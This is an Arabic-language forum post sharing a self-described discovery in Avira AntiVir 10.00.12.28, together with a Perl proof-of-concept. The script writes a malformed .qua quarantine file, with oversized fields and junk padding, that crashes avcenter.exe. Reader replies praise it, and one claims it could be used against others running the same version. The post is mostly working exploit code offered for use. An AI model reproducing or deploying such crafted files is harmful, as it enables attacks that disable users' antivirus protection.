ثغرة جديدة في برناكج Avira anti Virus الإستغلال بـ perl

السلام عليكم ورحمة اللله …

هاذا أول موضوعاتي وأريد من خلاله تقديم ثغرة من إكتشافي في مضاد الفيروسات الشهير AVIRA

مواقع التي نشرت فيها الثغرة :

http://www.exploit-db.com/exploits/16193/

http://bugsearch.net/en/11434/d-avira-antvir-qua-file-in-avcenterexe-local-crash-poc-z.html

كود بيرل :


[LEFT]#!/usr/bin/perl
#================================================================================= |                
#| # Title    : Avira AntVir QUA file in ( avcenter.exe) Local Crash PoC           |
#| # Author   : KedAns-Dz                                                          |
#| # email    : Ked-h@hotmail.com                                                  |
#| # Home     : HMD/AM (30500/04300) - Algeria -(00213555248701)                   |
#| # Web Site : /(~_-)\ ...                                                        |
#| # Tested on : windows XP SP3 Français & Arabic                                  |
#| # Target SFW : Avira Anti Virus Version 10.00.12.28                             | 
#| # Info : Copy the QUA file in :                                                 |
#          ..\..\All Users\Application Data\Avira\AntiVir Desktop\INFECTED         |
#    > You are Opening The avcenter.exe and show Quarantine list                   |
#                          the avcenter is Task kill and Show Crash Error          |
#======================      Exploit By KedAns-Dz       ===========================|
# Perl File  : 
#----------------------------------
#START SYSTEM /root@MSdos/ : 
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "

".                  
      "      ||========================================||
".
   "      ||                                        ||
".
   "      ||   Avira AntVir Local Crash PoC         ||
".
   "      ||      Exploit Buffer Overflow           ||
".
   "      ||    Created BY KedAns-Dz                ||
".
   "      ||   ked-h(at)hotmail(dot)com             ||
".
   "      ||                                        ||
".
   "      ||========================================||


";
sleep(2);
print "
";
my $Buf = 
"\x41\x6e\x74\x69\x56\x69\x72\x20\x51\x75\x61\x00\x00\x00\x00\x00".
"\x46\x01\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x00\x28\x00\x00\x02\x00\x00\x0e\x04\x69\x4c\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x02\x00".
"\x00\x07\x00\x00\x00\x42".
"\x00" x 51 .
"\x4b\x65\x64\x40\x41\x6e\x73\x2f\x41\x76\x32\x42\x6f\x46\x2e\x50\x6c\x7c". # Infected Name
"\x31" x 378 . # Bad Multi Number
"\x00" x 48 .
"\x5c\x00\x5c\x00\x3f\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x4b\x00\x2e\x00\x44\x00\x7a" . # Path V-Qua
"\x41" x 380 ; # Junk
$file = "4fkedans.qua";
open (F ,">$file");
print F $Buf;
sleep (2);
print "
 Creat File : $file , Succesfully ! 
";
close (F);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
#[»] Team :  [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers <                 |
# Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
# Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends ..    | 
#------------------------------------------------------------------------------|[/LEFT]
 

أرجو أن يستفيد منها الجميع

good exploit man
i test and i back
thanks …

و مافائدتها يا اخى؟؟؟

مجهود رائع اخى الكريم

لاهنت

يعطيك الف عافيه …

[b]

و مافائدتها يا اخى؟؟؟

الاوفر فلاو اخي
تغرات ريموت يعني استغلال التغرة لمن لديهم نفس اصدار افيرا
يعني تعلم لاوفر فلاو اخي
مشكور اخي جاري التجربة[/b]